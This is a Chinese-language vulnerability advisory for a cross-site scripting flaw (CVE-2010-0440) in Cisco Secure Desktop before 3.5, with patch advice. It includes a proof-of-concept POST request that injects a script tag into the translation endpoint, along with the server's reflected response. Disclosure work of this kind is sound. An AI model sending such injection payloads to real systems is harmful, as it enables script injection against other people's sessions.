受影响系统:
Cisco Secure Desktop < 3.5
不受影响系统:
Cisco Secure Desktop 3.5.841
描述:
BUGTRAQ ID: 37960
CVE ID: CVE-2010-0440
Cisco Secure Desktop(CSD)可以通过加密降低远程用户注销或SSL VPN会话超时后Cookies、浏览器历史记录、临时文件和下载内容在系统上所遗留的风险。
Cisco Secure Desktop没有充分地验证特制的请求是否是由提交POST请求用户所提供,导致以下文件中存在跨站脚本漏洞:
/—–
https://{IP}//+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us
– —–/
使用POST变量:
/—–
Starting, please wait…"><script>alert(1);</script>
– —–/
在HTML内容中使用的时候没有编码POST字段的内容,因此允许攻击者控制内容注入JavaScript代码。此外,由于上述POST内容在binary/mainv.js中用作了eval()函数的输入,这还可能导致向start.html页面注入JavaScript代码并在eval()函数的环境中执行:
/—–
282 http_request.open(‘POST’, path, false);
283 http_request.send(msgs);
284 var trans = new Array();
285 try {
286 eval(http_request.responseText);
287 } catch (e) {}
– —–/
<*来源:Matias Pablo Brutti
链接:http://marc.info/?l=bugtraq&m=126506410826098&w=2
http://tools.cisco.com/security/center/viewAlert.x?alertId=19843
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/—–
REQUEST:
POST
https://{IP}/+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us
HTTP/1.1
Host: {IP}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9)
Gecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://{IP}/CACHE/sdesktop/install/start.htm
Content-Type: application/xml; charset=UTF-8
Cookie: webvpnLang=en-us; webvpnlogin=1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 56
Starting, please wait…"><script>alert(1);</script>
RESPONSE:
HTTP/1.1 200 OK
Server: Cisco AWARE 2.0
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Mon, 16 Nov 2009 14:14:07 GMT
Content-Length: 122
trans["Starting, please wait…\"><script>alert(1);</script>"] =
"Starting, please wait…\"><script>alert(1);</script>";
– —–/
建议:
厂商补丁:
Cisco
—–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
0 条评论。